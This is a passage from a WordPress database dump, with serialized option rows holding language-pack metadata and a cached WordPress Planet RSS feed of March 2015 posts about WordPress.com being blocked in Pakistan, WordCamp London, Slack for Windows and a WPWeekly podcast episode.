(Taiwan)\";s:11:\"native_name\";s:12:\"繁體中文\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.1.1/zh_TW.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"zh\";i:2;s:3:\"zho\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"繼續\";}}s:5:\"zh_CN\";a:8:{s:8:\"language\";s:5:\"zh_CN\";s:7:\"version\";s:3:\"4.1\";s:7:\"updated\";s:19:\"2014-12-26 02:21:02\";s:12:\"english_name\";s:15:\"Chinese (China)\";s:11:\"native_name\";s:12:\"简体中文\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.1/zh_CN.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"zh\";i:2;s:3:\"zho\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"继续\";}}}','yes'),(1042,'_transient_timeout_feed_d117b5738fbd35bd8c0391cda1f2b5d9','1427106779','no'),(1043,'_transient_feed_d117b5738fbd35bd8c0391cda1f2b5d9','a:4:{s:5:\"child\";a:1:{s:0:\"\";a:1:{s:3:\"rss\";a:1:{i:0;a:6:{s:4:\"data\";s:3:\"\n\n\n\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:7:\"version\";s:3:\"2.0\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:1:{s:7:\"channel\";a:1:{i:0;a:6:{s:4:\"data\";s:61:\"\n \n \n \n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:16:\"WordPress Planet\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://planet.wordpress.org/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"language\";a:1:{i:0;a:5:{s:4:\"data\";s:2:\"en\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:47:\"WordPress Planet - http://planet.wordpress.org/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"item\";a:50:{i:0;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:60:\"WPTavern: Pakistan is Blocking Sites Hosted on WordPress.com\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=40936\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:70:\"http://wptavern.com/pakistan-is-blocking-sites-hosted-on-wordpress-com\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2746:\"<p>Local Pakistani news <a href=\"http://propakistani.pk/2015/03/22/pta-blocks-wordpress-com-in-pakistan/\" target=\"_blank\">sources</a> are reporting that the <a href=\"http://www.pta.gov.pk/\" target=\"_blank\">Pakistan Telecommunication Authority</a> (PTA) has demanded that local internet service providers block access to <a href=\"http://wordpress.com\" target=\"_blank\">WordPress.com</a>. Traffic originating from all major Pakistani ISPs will not be able to view sites hosted on WordPress.com. Self-hosted WordPress sites currently remain unaffected.</p>\n<p><a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/03/wordpressdotcom-blocked-pakistan.jpg\" rel=\"prettyphoto[40936]\"><img src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/03/wordpressdotcom-blocked-pakistan.jpg?resize=556%2C370\" alt=\"wordpressdotcom-blocked-pakistan\" class=\"aligncenter size-full wp-image-40940\" /></a></p>\n<p>A source, who wished to remain anonymous, told <a href=\"http://propakistani.pk/2015/03/22/pta-blocks-wordpress-com-in-pakistan/\" target=\"_blank\">ProPakistani.pk</a> that the content causing the block is a matter of Pakistani national security but that WordPress.com should be unblocked within 48 hours:</p>\n<blockquote><p>A source at Pakistan Telecommunication Authority has confirmed ProPakistani that WordPress.com is temporarily blocked in Pakistan due to severe issues related to national security. It appears now that blocking decision is somewhat related to Pakistan Day.</p></blockquote>\n<p>Pakistan Day is a public holiday celebrated every year on March 23, marking the country’s independence from British India. Public businesses are generally closed. The holiday typically includes a parade, festivals, parties, and a national awards ceremony for military personnel and civilians.</p>\n<p>At this time, the reason for the block has not been officially confirmed, but ProPakistani.pk’s sources indicate that it is not due to outright censorship. However, Pakistan has a <a href=\"http://en.wikipedia.org/wiki/Websites_blocked_in_Pakistan\" target=\"_blank\">history of blocking sites</a>, such as YouTube, Facebook, and Flickr, citing “blasphemous material” as the reason.</p>\n<p>According to <a href=\"http://12mars.rsf.org/2014-en/2014/03/10/pakistan-upgraded-censorship/\" target=\"_blank\">Reporters Without Borders</a>, the PTA blocked 20,000 to 40,000 websites in 2014 for content that authorities deemed inappropriate. Since the PTA also issues licenses to ISPs, any company that fails to comply is at risk of losing its operating license.</p>\n<p>As there is no official announcement from the PTA at this time, it is yet to be determined whether WordPress.com is under a temporary block or a permanent one.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sun, 22 Mar 2015 22:14:25 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:1;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Matt: Meyer Sound Constellation\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"http://ma.tt/?p=44751\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:47:\"http://ma.tt/2015/03/meyer-sound-constellation/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:340:\"<p>The Appel Room at Jazz at Lincoln Center has an <cite><a href=\"http://www.cnet.com/news/meyer-sounds-advanced-tech-takes-concert-sound-into-the-21st-century/\">awesome ambient sound system that sounds acoustic and full from every point in the 500-seat room.</a>. <cite>Hat tip: <a href=\"http://www.niallkennedy.com/\">Niall</a></cite>.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sun, 22 Mar 2015 04:54:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:2;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:56:\"WPTavern: WordCamp London 2015 Contributor Day in Photos\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=40899\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:66:\"http://wptavern.com/wordcamp-london-2015-contributor-day-in-photos\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3359:\"<p><a href=\"http://london.wordcamp.org/2015/\" target=\"_blank\">WordCamp London 2015</a> kicked off this morning with Contributor Day. 100 attendees convened at the graduate center on Holloway Road for a full day of giving back to WordPress, BuddyPress, and GlotPress. Contributors wrote and tested patches, created documentation, and collaborated on marketing materials.</p>\n\n<a href=\"http://wptavern.com/wordcamp-london-2015-contributor-day-in-photos/attachment/135\"><img src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/03/135.jpg?resize=150%2C150\" class=\"attachment-thumbnail\" alt=\"135\" /></a>\n<a href=\"http://wptavern.com/wordcamp-london-2015-contributor-day-in-photos/attachment/141\"><img src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/03/141.jpg?resize=150%2C150\" class=\"attachment-thumbnail\" alt=\"141\" /></a>\n<a href=\"http://wptavern.com/wordcamp-london-2015-contributor-day-in-photos/attachment/142\"><img src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/03/142.jpg?resize=150%2C150\" class=\"attachment-thumbnail\" alt=\"142\" /></a>\n<a href=\"http://wptavern.com/wordcamp-london-2015-contributor-day-in-photos/attachment/147\"><img src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/03/147.jpg?resize=150%2C150\" class=\"attachment-thumbnail\" alt=\"147\" /></a>\n<a href=\"http://wptavern.com/wordcamp-london-2015-contributor-day-in-photos/attachment/151\"><img src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/03/151.jpg?resize=150%2C150\" class=\"attachment-thumbnail\" alt=\"151\" /></a>\n<a href=\"http://wptavern.com/wordcamp-london-2015-contributor-day-in-photos/155-2\"><img src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/03/155.jpg?resize=150%2C150\" class=\"attachment-thumbnail\" alt=\"155\" /></a>\n<a href=\"http://wptavern.com/wordcamp-london-2015-contributor-day-in-photos/157-2\"><img src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/03/157.jpg?resize=150%2C150\" class=\"attachment-thumbnail\" alt=\"157\" /></a>\n<a href=\"http://wptavern.com/wordcamp-london-2015-contributor-day-in-photos/attachment/158\"><img src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/03/158.jpg?resize=150%2C150\" class=\"attachment-thumbnail\" alt=\"158\" /></a>\n<a href=\"http://wptavern.com/wordcamp-london-2015-contributor-day-in-photos/attachment/159\"><img src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/03/159.jpg?resize=150%2C150\" class=\"attachment-thumbnail\" alt=\"159\" /></a>\n<a href=\"http://wptavern.com/wordcamp-london-2015-contributor-day-in-photos/attachment/162\"><img src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/03/162.jpg?resize=150%2C150\" class=\"attachment-thumbnail\" alt=\"162\" /></a>\n<a href=\"http://wptavern.com/wordcamp-london-2015-contributor-day-in-photos/attachment/174\"><img src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/03/174.jpg?resize=150%2C150\" class=\"attachment-thumbnail\" alt=\"174\" /></a>\n<a href=\"http://wptavern.com/wordcamp-london-2015-contributor-day-in-photos/attachment/176\"><img src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/03/176.jpg?resize=150%2C150\" class=\"attachment-thumbnail\" alt=\"176\" /></a>\n<a href=\"http://wptavern.com/wordcamp-london-2015-contributor-day-in-photos/attachment/177\"><img src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/03/177.jpg?resize=150%2C150\" class=\"attachment-thumbnail\" alt=\"177\" /></a>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 20 Mar 2015 17:47:34 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:3;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:51:\"WPTavern: Slack Releases Standalone App For Windows\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=40918\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:61:\"http://wptavern.com/slack-releases-standalone-app-for-windows\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1944:\"<p>After months of requests, <a title=\"https://slack.com/\" href=\"https://slack.com/\">Slack</a> has released a <a title=\"http://slackhq.com/post/113969353750/slack-for-windows\" href=\"http://slackhq.com/post/113969353750/slack-for-windows\">standalone app for Windows</a>. Until now, those on Windows machines could only use Slack through a browser. The app is fast and provides a similar user experience to its <a title=\"https://itunes.apple.com/us/app/slack/id803453959?mt=12\" href=\"https://itunes.apple.com/us/app/slack/id803453959?mt=12\">Mac counterpart</a>. It works on Windows 7 and above, including the Windows 10 preview.</p>\n<a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/03/SlackWindowsApp.png\" rel=\"prettyphoto[40918]\"><img class=\"size-full wp-image-40919\" src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/03/SlackWindowsApp.png?resize=1025%2C730\" alt=\"Slack on Windows\" /></a>Slack on Windows\n<p>Instead of using a browser tab for each team you’re connected to, the app has a team switcher on the left sidebar. Each team has its own notification count and you can easily switch between them using <a title=\"https://slack.zendesk.com/hc/en-us/articles/201374536-Slack-keyboard-shortcuts\" href=\"https://slack.zendesk.com/hc/en-us/articles/201374536-Slack-keyboard-shortcuts\">keyboard shortcuts</a>.</p>\n<p>There’s a few other features as well, but the most important one for me is its performance. When I used Slack in FireFox, it routinely bogged down the browser to the point of having to close it. Now that Slack is a standalone app on Windows, I don’t have to worry about my browser slowing to a crawl. It’s also nice to be able to run Slack in the background without it using a lot of resources.</p>\n<p>With more than 30% of Slack’s users running Windows, it’s nice to finally have an option that’s on par with the experience Mac users have enjoyed for months.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 20 Mar 2015 16:41:56 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:4;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:36:\"Matt: The Billionaire’s Typewriter\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"http://ma.tt/?p=44875\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:32:\"http://ma.tt/2015/03/typewriter/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1365:\"<blockquote><p>In truth, Medium’s main product is not a publishing platform, but the promotion of a publishing platform. This promotion brings readers and writers onto the site. This, in turn, generates the usage data that’s valuable to advertisers. Boiled down, Medium is simply marketing in the service of more marketing. It is not a “place for ideas.” It is a place for advertisers. It is, therefore, utterly superfluous.</p></blockquote>\n<p>and</p>\n<blockquote><p>As a fan of minimalism, however, I think that term is misapplied here. Minimalism doesn’t foreclose either expressive breadth or conceptual depth.</p></blockquote>\n<p>and </p>\n<blockquote><p>To get his fracking permit on your territory, Mr. Williams (the multibillionaire) needs to persuade you (the writer) that a key consideration in your work (namely, how & where you offer it to readers) is a “waste of time.”</p></blockquote>\n<p>Matthew Butterick’s essay <a href=\"http://practicaltypography.com/billionaires-typewriter.html\"><cite>The billionaire’s typewriter</cite> has a fairly complete and scathing takedown of Medium’s rhetoric, promise for writers, and product offering</a>. Hat tip: <a href=\"http://aten.co/\">Edward Aten</a>.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 20 Mar 2015 16:15:35 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:5;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:99:\"WPTavern: How to Add a WordPress Site’s Pageview and Visitor Count to The iOS Notification Center\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=40879\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:106:\"http://wptavern.com/how-to-add-a-wordpress-sites-pageview-and-visitor-count-to-the-ios-notification-center\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3015:\"<p>If you use the <a title=\"https://itunes.apple.com/us/app/wordpress/id335703880?mt=8\" href=\"https://itunes.apple.com/us/app/wordpress/id335703880?mt=8\">WordPress for iOS mobile app</a>, you can easily add a site’s pageviews and visitor stats to the iOS notification center. To add WordPress to the notification center, perform a top to bottom swipe on the iPhone’s home screen. Scroll to the bottom and tap the Edit button.</p>\n<a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/03/332.png\" rel=\"prettyphoto[40879]\"><img class=\"wp-image-40882 size-large\" src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/03/332.png?resize=282%2C500\" alt=\"Notification Center Edit Button\" /></a>Click the edit button\n<p>You should see the WordPress app in the Do Not Include section. Click the green plus symbol next to WordPress to add it to the Today summary. When viewing the Today summary, you’ll see visitor and pageview statistics.</p>\n\n<a href=\"http://wptavern.com/how-to-add-a-wordpress-sites-pageview-and-visitor-count-to-the-ios-notification-center/attachment/331\"><img src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/03/331.png?fit=500%2C500\" class=\"attachment-large\" alt=\"Adding WordPress to The Notifcation Center\" /></a>\n<a href=\"http://wptavern.com/how-to-add-a-wordpress-sites-pageview-and-visitor-count-to-the-ios-notification-center/attachment/335\"><img src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/03/335.png?fit=500%2C500\" class=\"attachment-large\" alt=\"Website stats in the notification center\" /></a>\n\n<p>If you manage multiple sites through the app and want to display a different site’s statistics, open the WordPress mobile app and select the site you want to display.</p>\n<p>Tap the stats link, then tap on the Today link in to the top right portion of the screen where an alert explains that statistics will display in the notification center. Keep in mind that you can only display statistics of one site.</p>\n\n<a href=\"http://wptavern.com/how-to-add-a-wordpress-sites-pageview-and-visitor-count-to-the-ios-notification-center/attachment/333\"><img src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/03/333.png?fit=500%2C500\" class=\"attachment-large\" alt=\"WP Tavern\'s statistics\" /></a>\n<a href=\"http://wptavern.com/how-to-add-a-wordpress-sites-pageview-and-visitor-count-to-the-ios-notification-center/attachment/334\"><img src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/03/334.png?fit=500%2C500\" class=\"attachment-large\" alt=\"Selecting Use This Site will add its stats to the Notification center\" /></a>\n\n<p>I’d like to see this feature expanded so that I can add multiple sites to the notification center where I can view stats for different sites by swiping left or right. I’d also like to configure which two statistics are displayed. Despite these caveats, it’s a quick and convenient way to view a site’s visitor and pageview count without having to load the WordPress mobile app.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 20 Mar 2015 07:23:35 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:6;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:85:\"WPTavern: WPWeekly Episode 184 – Inside Envato With Stephen Cronin and Will Herring\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:44:\"http://wptavern.com?p=40874&preview_id=40874\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:91:\"http://wptavern.com/wpweekly-episode-184-inside-envato-with-stephen-cronin-and-will-herring\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3008:\"<p><a title=\"http://marcuscouch.com/\" href=\"http://marcuscouch.com/\">Marcus Couch</a> and I are joined by <a title=\"https://twitter.com/stephencronin\" href=\"https://twitter.com/stephencronin\">Stephen Cronin</a> and <a title=\"https://twitter.com/williamherring\" href=\"https://twitter.com/williamherring\">William Herring</a> of Envato to discuss ThemeForest, Envato, WordPress themes, and several other topics. We discover how ThemeForest reviews themes and discuss what the company is doing to improve the quality of themes sold on its marketplace. After the interview, we cover the news and wrap up the show with the plugin picks of the week.</p>\n<h2>Stories Discussed:</h2>\n<p><a title=\"http://wptavern.com/wordpress-4-2-beta-1-now-available-for-testing\" href=\"http://wptavern.com/wordpress-4-2-beta-1-now-available-for-testing\">WordPress 4.2 Beta 1 Now Available for Testing</a><br />\n<a title=\"http://wptavern.com/pods-framework-security-release-fixes-severe-vulnerability\" href=\"http://wptavern.com/pods-framework-security-release-fixes-severe-vulnerability\">Pods Framework Security Release Fixes Severe Vulnerability</a><br />\n<a title=\"http://wptavern.com/tidy-repo-launches-wordpress-plugin-recommendation-service\" href=\"http://wptavern.com/tidy-repo-launches-wordpress-plugin-recommendation-service\">Tidy Repo Launches WordPress Plugin Recommendation Service</a><br />\n<a title=\"http://wptavern.com/jetpack-3-4-adds-protection-against-brute-force-attacks\" href=\"http://wptavern.com/jetpack-3-4-adds-protection-against-brute-force-attacks\">Jetpack 3.4 Adds Protection Against Brute Force Attacks</a></p>\n<h2>Plugins Picked By Marcus:</h2>\n<p><a title=\"https://wordpress.org/plugins/text-2-speech/\" href=\"https://wordpress.org/plugins/text-2-speech/\">TEXT2SPEECH</a> allows you to automatically transform any text to an HTML5 MP3 player where Google voice will read it.</p>\n<p><a title=\"https://wordpress.org/plugins/equal-height-columns/\" href=\"https://wordpress.org/plugins/equal-height-columns/\">Equal Height Columns</a> lets you easily equalize the height of various columns and elements.</p>\n<p><a title=\"https://wordpress.org/plugins/latest-video-post-widget/\" href=\"https://wordpress.org/plugins/latest-video-post-widget/\">Latest Video</a> is a widget that shows the latest post that contains video embedded with an iFrame.</p>\n<h2>WPWeekly Meta:</h2>\n<p><strong>Next Episode:</strong> Wednesday, March 25th 9:30 P.M. Eastern</p>\n<p><strong>Subscribe To WPWeekly Via Itunes: </strong><a href=\"https://itunes.apple.com/us/podcast/wordpress-weekly/id694849738\" target=\"_blank\">Click here to 